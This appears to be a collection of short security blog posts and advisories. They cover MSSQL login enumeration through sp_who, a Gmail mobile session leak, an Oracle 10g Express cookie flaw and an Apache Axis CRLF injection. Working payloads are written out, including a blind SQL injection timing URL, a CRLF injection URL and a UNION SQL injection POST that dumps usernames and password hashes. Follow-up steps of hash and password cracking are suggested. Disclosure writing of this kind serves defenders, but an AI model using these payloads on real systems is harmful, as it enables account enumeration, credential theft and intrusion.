www.notsosecure.com

In SQL server 2005, if you are not ’sa’ you can’t do much. This is primarily because openrowset is by default not available unless you are privileged. Stored procedure sp_who is available for public(in mssql 2000 and 2005). This procedure “provides information about current Microsoft® SQL Server™ users and processes”.

Enumeration:

exec sp_who 'validuser';

returns no records(as you don't have privileges to see information about other users) but no errors too..:)
-------------------------
exex sp_who 'invaliduser';
returns error:
Msg 15007, Level 16, State 1, Procedure sp_who, Line 59
'invaliduser' is not a valid login or you do not have permission.
————————

Hence, you can enumerate usernames. You can also enumerate Windows users (if mixed mode authentication is enabled) like this:

exec sp_who ‘test-system\Administrator’

and also possibly the domain users, depending upon which domain users are allowed to connect(typically domain admins).

You need to know the valid machine_name/domain_name for this to work. But that’s not a problem as this can be obtained from the following:

1. IIS NTLM authentication, which discloses machine name and domain name(use hoppy).
2. This can also be obtained from terminal services dialog box.
3. This stored procedure(sp_who) itself returns the hostname.
4. There are other several ways to obtain this.

After you have enumerated users, you know what to do next. Try cracking passwords through other services e.g. RDP, SMB etc.

Through SQL Injections use this poc to enumerate logins(assuming a blind sql injection):-

http://127.0.0.1/upload/sqlinjection/?qid=1;BEGIN TRY exec sp_who 'TEST-SYSTEM\blah' END TRY BEGIN CATCH return END CATCH waitfor delay '00:00:20'--

When the username is right, it will wait for 20 seconds.

If you are concerned about the security of your emails, accessing Gmail from a mobile device may not be a great idea.

1. A few weeks ago, google introduced a new feature in GMAIL, through which you can force the gmail session to not use HTTP at all, and only talk over HTTPS. This unfortunately does not apply to google mobile(http://mobile.google.com/) and even though you set your preferences to only use HTTPS, gmail accessed via mobile devices still make requests over HTTP. The HTTP request takes place in the background. The clear text response contains all the session cookies and also a URL over HTTPS.

2. Further to make matter worse, this URL returned over port 80, contains session-id in URL and is sufficient to access email(attacker does not need your session cookie). Thus, if your mobile device is going through a proxy server, and an attacker manages to access the logs of this proxy server, he will have access to this URL containing session id, and thus its slightly more concerning. Of course, once you log out, this URL will be no longer valid and hence the attack has a time limitation.

Update: Google has fixed the second issue and don’t appear to be too keen to fix the first one.

Oracle 10g Express Edition does not invalidate the cookie www_flow_user2 on server when the user logs off.

Tested in version:- Oracle 10g Express edition 10.2.0.1.0, other versions may also be vulnerable.

Patch:- Oracle CPU April 2008

Version tested:- 1.4

vendor's website:- http://ws.apache.org/axis/

Details:- The vulnerability reported earlier this year, was later addressed by apache axis group and the error messages in version 1.4  do not leak the document root or any directory structure. However, the error message returned for an non-existing WSDL is vulnerable to CRLF injection and although, it html encodes all the user's input, thereby denying any XSS or html injection, content injection is still be possible(a minor issue).

Exploit:-http://victim/axis/tt_pm4l%0d%0a%0d%0a%0d%0a%0d

%0a———————%0d%0aAn%20Error%20has%20Occured

%0d%0a%0d%0aplease%20send%20your%20

credentials%20and%20problem%20encountered%20to%20%0d

%0ablah@blah.com%0d%0a————–%0d%0a%0d%0a%0d

%0a.jws?wsdl

Output:-

AXIS error

Sorry, something seems to have gone wrong… here are the details:

Fault – ; nested exception is:

java.io.FileNotFoundException: /tt_pm4l

———————

 An Error has Occured

please send your credentials and problem encountered to

blah@blah.com

————–

.jws

 AxisFault

…

..
 

Original Advisory: http://www.portcullis-security.com/179.php 

The file /www/people/editprofile.php seems to be vulnerable to sql injection at multiple points.

The exploit is fairly easy, one post request returns all the usernames and hashes from the backend database.

The hashes can then be cracked using john-the-ripper.

Exploit:-

POST request to:/www/people/editprofile.php

skill_delete%5B%5D=484)+UNION+ALL+SELECT+user_name||unix_pw+

from+users–%3d1&MultiDelete=Delete

works against postgres database .

Refer to the paper for exploiting sql injections against postgres database.